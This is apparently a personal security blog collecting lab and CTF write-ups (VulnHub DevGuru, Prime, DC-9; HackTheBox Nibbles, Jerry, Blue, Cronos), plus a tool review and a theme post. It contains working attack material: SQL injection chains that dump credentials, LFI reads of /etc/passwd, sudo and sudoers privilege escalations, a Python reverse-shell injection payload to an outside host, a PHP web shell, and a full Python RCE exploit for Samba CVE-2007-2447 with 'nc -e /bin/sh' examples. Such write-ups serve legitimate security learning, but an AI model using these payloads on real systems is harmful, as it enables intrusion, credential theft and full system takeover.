Blog - Ziemni

[VulnHub] DevGuru 1

2021-05-05T00:00:00+02:00

Recon

Port Scan

nmap -p- -sV -vv -T4 192.168.2.110

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
8585/tcp open  unknown syn-ack

Regular website on port 80 and Gitea on port 8585.

Directory Scan (port 80)

ffuf -u http://192.168.2.110/FUZZ -w /usr/share/wordlists/dirb/big.txt -e .php,.txt,.html

.git
.htaccess               [Status: 200, Size: 1678, Words: 282, Lines: 53]
0                       [Status: 200, Size: 12669, Words: 929, Lines: 331]
About                   [Status: 200, Size: 18661, Words: 977, Lines: 478]
Services                [Status: 200, Size: 10032, Words: 815, Lines: 267]
about                   [Status: 200, Size: 18661, Words: 977, Lines: 478]
adminer.php             [Status: 200, Size: 4145, Words: 186, Lines: 51]
backend                 [Status: 302, Size: 410, Words: 60, Lines: 12]
config                  [Status: 301, Size: 315, Words: 20, Lines: 10]
index.php               [Status: 200, Size: 12719, Words: 929, Lines: 331]
modules                 [Status: 301, Size: 316, Words: 20, Lines: 10]
plugins                 [Status: 301, Size: 316, Words: 20, Lines: 10]
server.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
services                [Status: 200, Size: 10032, Words: 815, Lines: 267]
storage                 [Status: 301, Size: 316, Words: 20, Lines: 10]
themes                  [Status: 301, Size: 315, Words: 20, Lines: 10]
vendor                  [Status: 301, Size: 315, Words: 20, Lines: 10]

/adminer.php - Admirer 4.8.0

/backend/ - October CMS build 469

We can extract .git using goop.

goop http://192.168.2.110/ ./git/

-rw-r--r-- 1 ziemni ziemni 362514 May  5 14:23 adminer.php
-rw-r--r-- 1 ziemni ziemni   1640 May  5 14:23 artisan
drwxr-xr-x 2 ziemni ziemni   4096 May  5 14:23 bootstrap
drwxr-xr-x 2 ziemni ziemni   4096 May  5 14:23 config
-rw-r--r-- 1 ziemni ziemni   1173 May  5 14:23 index.php
drwxr-xr-x 5 ziemni ziemni   4096 May  5 14:23 modules
drwxr-xr-x 3 ziemni ziemni   4096 May  5 14:23 plugins
-rw-r--r-- 1 ziemni ziemni   1518 May  5 14:23 README.md
-rw-r--r-- 1 ziemni ziemni    551 May  5 14:23 server.php
drwxr-xr-x 6 ziemni ziemni   4096 May  5 14:23 storage
drwxr-xr-x 4 ziemni ziemni   4096 May  5 14:23 themes

Exploitation

October CMS

Within /config/database.php we can find database credentials.

        'mysql' => [
            'driver'     => 'mysql',
            'engine'     => 'InnoDB',
            'host'       => 'localhost',
            'port'       => 3306,
            'database'   => 'octoberdb',
            'username'   => 'october',
            'password'   => 'SQ66EBYx4GT3byXH',
            'charset'    => 'utf8mb4',
            'collation'  => 'utf8mb4_unicode_ci',
            'prefix'     => '',
            'varcharmax' => 191,
        ],

Using those credentials we can access this database through adminer.php and view the backend_users table.

Although I wasn’t able to crack that hash, I just replaced it with a new one. After that, I could log into october cms.

I’ve created a new page called ziemni and I made it execute whatever is passed in c argument.

PrivEsc

www-data -> frank

Looking for files owned by frank user revealed some interesting directories.

find / -user frank -ls 2>/dev/null | grep -v "/proc/"

   656007      4 drwxr-xr-x   7 frank    frank        4096 Nov 19 02:39 /var/lib/gitea
   662525      4 drwxr-xr-x   2 frank    frank        4096 Nov 19 02:39 /var/lib/gitea/custom
   665045      4 drwxr-x---   2 frank    frank        4096 Nov 19 02:42 /var/lib/gitea/log
   665017      4 drwxr-x---   3 frank    frank        4096 Nov 19 02:50 /var/lib/gitea/indexers
   665000      4 drwxr-x---   7 frank    frank        4096 Nov 19 02:50 /var/lib/gitea/data
   665040      4 drwxr-xr-x   2 frank    frank        4096 Nov 19 02:39 /var/lib/gitea/public
   656501     56 -rw-r--r--   1 frank    frank       56688 Nov 19 19:34 /var/backups/app.ini.bak
   919157 104928 -rwxrwxr-x   1 frank    frank    107443064 Nov 19 02:42 /usr/local/bin/gitea
   408540      4 drwxr-x---   3 frank    frank         4096 May  5 08:19 /opt/gitea
   410236      4 drwxr-x---   7 frank    frank         4096 Nov 19 21:12 /home/frank
   535852      4 drwxr-x---   2 frank    frank         4096 Nov 19 21:11 /etc/gitea

In the /var/backups/app.ini.bak file there is a password to the gitea’s database.

We can use it in adminer to view the database. In user table we can change frank’s password and password hachink algorithm.

Now we are in the Gitea.

I’ve created a git hook to execute my shell on update.

Updating the repo spawns a reverse shell.

frank -> root

frank can execute /usr/bin/sqlite3 as NOT root.

There is this old trick to bypass !root by executing sudo -u#-1. This way we can spawn sqlite3 as root and use GTFOBins to spawn a shell.

[VulnHub] Prime 1

2021-05-04T00:00:00+02:00

Recon

Port Scan

nmap -p- -T4 -vv -sV 192.168.2.55

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))

Directory Scan

ffuf -u http://$TARGET_IP/FUZZ -w /usr/share/wordlists/dirb/big.txt -e .php,.txt,.html

dev                     [Status: 200, Size: 131, Words: 24, Lines: 8]
index.php               [Status: 200, Size: 136, Words: 8, Lines: 8]
image.php               [Status: 200, Size: 147, Words: 8, Lines: 7]
javascript              [Status: 301, Size: 317, Words: 20, Lines: 10]
secret.txt              [Status: 200, Size: 412, Words: 66, Lines: 16]
server-status           [Status: 403, Size: 300, Words: 22, Lines: 12]
wordpress               [Status: 301, Size: 316, Words: 20, Lines: 10]

http://192.168.2.55/dev

hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking. 

http://192.168.2.55/secret.txt

Looks like you have got some secrets.

Ok I just want to do some help to you. 

Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

//see the location.txt and you will get your next move//

As requested in the link:

ffuf -u 'http://192.168.2.55/index.php?FUZZ=something' -w /usr/share/wordlists/dirb/big.txt -fs 136

file                    [Status: 200, Size: 206, Words: 15, Lines: 8]

Based on one of the previous notes:

http://192.168.2.55/index.php?file=location.txt

ok well Now you reah at the exact parameter

Now dig some more for next one
use 'secrettier360' parameter on some other php page for more fun. 

Exploitation

LFI

Finally we have some real LFI.

http://192.168.2.55/image.php?secrettier360=/etc/passwd

There are two users on the system saket and victor. For some reason saket user had this in his passwd file: find password.txt file in my directory:/home/saket

http://192.168.2.55/image.php?secrettier360=/home/saket/password.txt

follow_the_ippsec

Wordpress

Let’s go back and look at the wordpress installation.

The saked user didn’t work with that password, but victor did.

After looking around for a bit, I found a random writeable file in one of the themes.

I’ve put in php reverse shell into it and navigated to the page.

http://192.168.2.55/wordpress/wp-content/themes/twentynineteen/secret.php

PrivEsc

www-data -> saket

www-data user can execute /home/saket/enc as root. Additionally, I’ve found a file `/opt/backup/server_database/backup_pass’ which contained a password to this binary.

After executing it and giving it a password it created some new file in /home/saket.

I know you are the fan of ippsec.

So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

When executing this binary, but passing it md5 of ippsec in replaced the enc.txt file with a new string. This time it was AES with the same md5 hash.

Dont worry saket one day we will reach to
our destination very soon. And if you forget 
your username then use your old password
==> "tribute_to_ippsec"

Victor,

saket -> root

saket can execute /home/victor/undefeated_victor as root.

After a bit of poking, it seems like this binary takes whatever is in /tmp/challenge and executes it.

Getting root was as simple as putting a command that would put my ssh key in root’s .ssh folder into /tmp/challenge.

sudo /home/victor/undefeated_victor
echo 'mkdir /root/.ssh/authorized_keys' > challenge
sudo /home/victor/undefeated_victor
echo 'echo "<my_ssh_key">/root/.ssh/authorized_keys' > challenge

[VulnHub] DC-9

2021-05-03T00:00:00+02:00

Recon

Port Scan

nmap -T 4 -p- -sV --script vuln -vv 192.168.2.125

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))

Directory Scan

ffuf -u http://192.168.2.125/FUZZ -w /usr/share/wordlists/dirb/big.txt -e .php,.txt,.html

config.php              [Status: 200, Size: 0, Words: 1, Lines: 1]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10]
display.php             [Status: 200, Size: 2961, Words: 199, Lines: 42]
includes                [Status: 301, Size: 317, Words: 20, Lines: 10]
index.php               [Status: 200, Size: 917, Words: 43, Lines: 43]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1]
manage.php              [Status: 200, Size: 1210, Words: 43, Lines: 51]
results.php             [Status: 200, Size: 1056, Words: 43, Lines: 55]
search.php              [Status: 200, Size: 1091, Words: 47, Lines: 50]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10]
session.php             [Status: 302, Size: 0, Words: 1, Lines: 1]
welcome.php             [Status: 302, Size: 0, Words: 1, Lines: 1]

Exploitation

SQL Injection

There is a search box on /search.php that is vulnerable to SQL Injection.

For payload ' or 1=1--+:

There are 6 values that are printed.

1' UNION SELECT 1,2,3,4,5,6--+

It is possible to enumerate evetrything manually.

' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata--+

ID: 1<br/>
Name: 2 3<br/>
Position: 4<br />
Phone No: 5<br />
Email: |information_schema|,|Staff|,|users|<br/>

' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(0x7c,TABLE_NAME,0x7c) FROM information_schema.tables WHERE table_schema = 'Staff'--+

ID: 1<br/>
Name: 2 3<br/>
Position: 4<br />
Phone No: 5<br />
Email: |StaffDetails|,|Users|<br/>

' UNION SELECT 1,2,3,4,5,GROUP_CONCAT(0x7c,COLUMN_NAME,0x7c) FROM information_schema.columns WHERE table_name = 'Users'--+

ID: 1<br/>
Name: 2 3<br/>
Position: 4<br />
Phone No: 5<br />
Email: |UserID|,|Username|,|Password|<br/>

' UNION SELECT UserID,Username,Password,4,5,6 FROM Staff.Users--+

ID: 1<br/>
Name: admin 856f5de590ef37314e7c3bdf6f8a66dc<br/>
Position: 4<br/>
Phone No: 5<br/>
Email: 6<br/>

' UNION SELECT 1,username,password,4,5,6 FROM users.UserDetails--+

ID: 1<br/>
Name: marym 3kfs86sfd<br/>
Position: 4<br />
Phone No: 5<br />
Email: 6<br/>
<br/>
ID: 1<br/>
Name: julied 468sfdfsd2<br/>
Position: 4<br />
Phone No: 5<br />
Email: 6<br/>
<br/>
...

The hash is on crackstation and admin credentials are admin:transorbital1.

After logging in an error appears at the bottom of the page.

LFI

After messing with URL a bit, I’ve discovered LFI.

After A LOT of poking around I’ve found knockd.conf file at /welcome.php?file=../../../../../../etc/knockd.conf.

According to this file, SSH is enabled. I just need to knock on 7469,8475,9842 porst in that order.

for x in 7469 8475 9842l do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.2.125; done

After knocking on those port 22 becomes open.

nmap -p 22 192.168.2.125

PORT   STATE SERVICE
22/tcp open  ssh

I’ve compiled all creds from the database, generated wordlists from them and used them to bruteforce SSH.

hydra -L users.txt -P passwds.txt 192.168.2.125 ssh

[22][ssh] host: 192.168.2.125   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.2.125   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.2.125   login: janitor   password: Ilovepeepee

PrivEsc

In janitor’s home folder there is a hidden folder called .secrets-for-putin in which there is a password list.

Testing those password with user from the database we get new valid credentials for SSH fredf:B4-Tru3-001.

fredf user can execute /opt/devstuff/dist/test/test as root.

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

While executing this file asks for a file and a append. This binary takes a file and appends it to the other. I just created a file with fredf ALL=(ALL) ALL and appended it to /etc/sudoers to give fredf user ALL sudo privileges.

fredf@dc-9:~$ echo 'fredf ALL=(ALL) ALL' > test
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test /home/fredf/test /etc/sudoers
fredf@dc-9:~$ sudo su
root@dc-9:~# 
root@dc-9:~# id
uid=0(root) gid=0(root) groups=0(root)

Got root!

Make your Kali look retro

2021-04-06T00:00:00+02:00

I love retro aesthetic and I’ve recently decided to transform my Kali into OS of my dreams.

GTK: Belle Pintos Grande

Xfwm: Mofit-slim

Icons Pack: Chicago95

Wallpaper: HERE (I don’t know the original author)

[HackTheBox] Nibbles

2021-03-23T00:00:00+01:00

This box requires very basic pentesting skills to exploit. Starts with rce and ends with sudo.

Summary

Check source code of the main page.
Guess admin’s password on admin.php page.
Use CVE-2015-6967 to get a reverse shell.
sudo -l

Recon

Port Scan

nmap -p- -sV -T4 10.10.10.75

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Exploitation

NibbleBlog

Checking source code reveals a comment with a directory of the NibbleBlog.

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Scanning the blog with nikto reveal an admin login page. nikto -h http://10.10.10.75/nibbleblog/

+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /nibbleblog/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
+ OSVDB-3092: /nibbleblog/admin.php: This might be interesting...
+ OSVDB-3092: /nibbleblog/admin/: This might be interesting...

Running hydra or sqlmap on the page blocks you so we need to guess the password. After a bit of trial and error, I found that nibbles works as a password for admin account.

Now we can use CVE-2015-6967 to get a reverse shell. The link to the exploit can be found HERE.

connect to [10.10.14.19] from (UNKNOWN) [10.10.10.75] 47436
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:54:01 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ 

Privilege Escalation

Running sudo -l reveal that we can execute /home/nibbler/personal/stuff/monitor.sh as root.

sudo -l

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

The file does not exist, but we have write permissions to the directory so we can create it.

echo "/bin/bash" > /home/nibbler/personal/stuff/monitor.sh

And running it gives us root shell.

sudo /home/nibbler/personal/stuff/monitor.sh

CVE-2007-2447 in Python

2021-02-21T00:00:00+01:00

GitHub Link

Description

Python implementation of ‘Username’ map script’ RCE Exploit for Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447).

Usage

python3 smbExploit.py <IP> <PORT> <PAYLOAD>

IP - Ip of the remote machine.
PORT - (Optional) Port that smb is running on.
PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.

Examples:

python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'

Code

#
#        Samba 3.0.20 < 3.0.25rc3
#   'Username' map script' RCE Exploit
#               by Ziemni
#

#!/usr/bin/python3
import sys
try:
    from smb.SMBConnection import SMBConnection
except:
    print("pysmb is not installed: python3 -m pip install pysmb")
    quit()

if not (2 < len(sys.argv) < 5):
    print("Usage:")
    print("    python3 smbExploit.py <IP> <PORT> <PAYLOAD>")
    print("       IP - Ip of the remote machine.")
    print("       PORT - (Optional) Port that smb is running on.")
    print("       PAYLOAD - Payload to be executed on the remote machine e.g. reverse shell.")
    print("")
    print("Example: python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'")
    quit()

if len(sys.argv) == 3:
    ip = sys.argv[1]
    port = 139
    payload = sys.argv[2]
else:
    ip = sys.argv[1]
    port = sys.argv[2]
    payload = sys.argv[3]

user = "`" + payload + "`"
conn = SMBConnection(user, "na", "na", "na", use_ntlm_v2=False)

try:
    print("[*] Sending the payload")
    conn.connect(ip, int(port))
    print("[*] Payload was send successfully")
    quit()
except Exception as e:
    print("[*] Something went wrong")
    print("ERROR:")
    print(e)
    quit()

Resources

CVE-2007-2447: Remote Command Injection Vulnerability

Samba 3.0.20 < 3.0.25rc3 - ‘Username’ map script’ Command Execution (Metasploit)

[HackTheBox] Jerry

2020-10-24T00:00:00+02:00

Tomcat is a very popular “web container” software. This box teaches one of the vulnerabilities that can be used for RCE using Tomcat’s manager.

Summary

Enumerate machine’s services.
Exploit Tomcat’s upload vulnerability to get a shell as nt authority\system.

Recon

Port Scan

nmap -Pn -T4 -p- -sV 10.10.10.95

PORT     STATE SERVICE REASON  VERSION
8080/tcp open  http    syn-ack Apache Tomcat/Coyote JSP engine 1.1

Tomcat

Tomcat is running on port 8080. We can check if it is using default credentials using Metasploit’s module scanner/http/tomcat_mgr_login.

...
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
...

Exploit

Using those credentials we can use multi/http/tomcat_mgr_upload to get a shell on the system.

Tomcat is running as nt authority\system on this machine, which means the box is done…

[HackTheBox] Blue

2020-10-23T00:00:00+02:00

This machine is more about teaching a single exploit rather than usual HTB process. It is still fun and enjoyable!

Summary

Enumerate machine’s OS.
Use EternalBlue exploit to get a shell as nt authority\system.

Recon

Port Scan

nmap -T4 -p- -sV -n 10.10.10.40

PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC

nmap also shows that this machine is running Windows 7 SP 1

...
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
...

Exploit

Windows 7 SP 1 is vulnerable to a very popular and well-known exploit EternalBlue.

It can be easily exploited with Metasploit’s module windows/smb/ms17_010_eternalblue. It instantly gives you nt authority\system.

C:\Windows\system32>whoami
whoami
nt authority\system

webwrap - An amazing pseudo web shell tool

2020-09-14T00:00:00+02:00

Introduction

A few days ago, while doing a CTF I’ve encountered a problem. I was able to upload a PHP file to the target server, but I couldn’t spawn a web shell due to firewall restrictions. The only way I could interact with the server was by executing commands using the uploaded PHP files and printing output on the page.

The simplified PHP file (the original one utilized a disabled_functions bypass, because exec() was disabled in the config):

<?php
echo exec($_GET(['cmd']));
>

Until that CTF I was using a python script to automate it. In a while loop: get user input, create a request and print the response to the terminal. It works, but it’s very inefficient mainly because it doesn’t keep the current path. Fortunately, I found a tool that does exactly what I need!

webwrap

webwrap is a tool that automates the process described above and creates a pseudo shell that simulates a real one. Github: https://github.com/mxrch/webwrap

Installation

Linux (Quick)

curl -s https://raw.githubusercontent.com/mxrch/webwrap/master/install.sh | sudo sh

Linux (normal)

sudo apt install rlwrap
git clone https://github.com/mxrch/webwrap;
cd webwrap;
sudo python3 -m pip install -r requirements.txt

Windows

git clone https://github.com/mxrch/webwrap;
cd webwrap;
python -m pip install -r requirements.txt

Usage

webwrap http://<LINK>/my_verycool_webshell.php?cmd=WRAP

Where:

my_verycool_webshell.php is your shell file
cmd is the argument that shell uses $_GET(['<here>'])

Limitations

While using this tool you need to remember that it is not a real shell. Commands such as su or shh will not work as they require a full interactive terminal, but some of them can be bypassed with e.g. python’s pty. Additionally, commands that take more than ~2 seconds to execute will time out the request and break the script.

Conclusions

webwrap is an amazing tool to use when you cannot have a regular reverse shell. It automates a process of requesting command executions and makes you gain speed. Although it has its limitations I’ll definitely use it in future CTFs.

Credits

webwrap’s author: mxrch
webwrap’s github: Github

[HackTheBox] Cronos

2020-07-17T00:00:00+02:00

Cronos begins with a simple DNS enumeration to find a hidden subdomain with a login page. Then we exploit SQL and command injection vulnerabilities to get a shell. This machine requires knowledge of how cron jobs work to get root. Easy and fun machine!

Summary

Find admin subdomain.
Bypass login page using SQL injection.
Use command injection to get a reverse shell.
Enumerate and exploit cron jobs to get root.

Recon

Port Scan

nmap -n -sV -p- -T 5 -Pn 10.10.10.13

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

HTTP

http://10.10.10.13/ is just a default Apache2 page, but port 53 implies that there is a DNS server running on the machine. After adding 10.10.10.13 cronos.htb to ‘/etc/hosts’ file, I have visited http://cronos.htb, but it doesn’t seem to contain any interesting information.

After a while, I’ve decided to enumerate subdomains.

gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -d cronos.htb -r cronos.htb

Found: www.cronos.htb
Found: ns1.cronos.htb
Found: admin.cronos.htb
Found: WWW.cronos.htb
Found: NS1.cronos.htb

admin.cronos.htb is a login page. I’ve instantly tried a basic sql injection and got access to welcome.php page.

welcome.php

Exploit

welcome.php seems to be executing traceroute and ping commands on the machine and printing their output. If we assume that the php is structured like this:

...
exec("ping " . {whatever we put in})
...

wen can inject out commands into it. I’ve injected a python reverse shell:

8.8.8.8; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

and got a shell as www-data!

ROOT

After a bit of enumeration, I’ve noticed that there is a cronjob set to execute php /var/www/laravel/artisan every minute as root.

I’ve just replaced /var/www/laravel/artisan with a php reverse shell and after a while got a shell as root!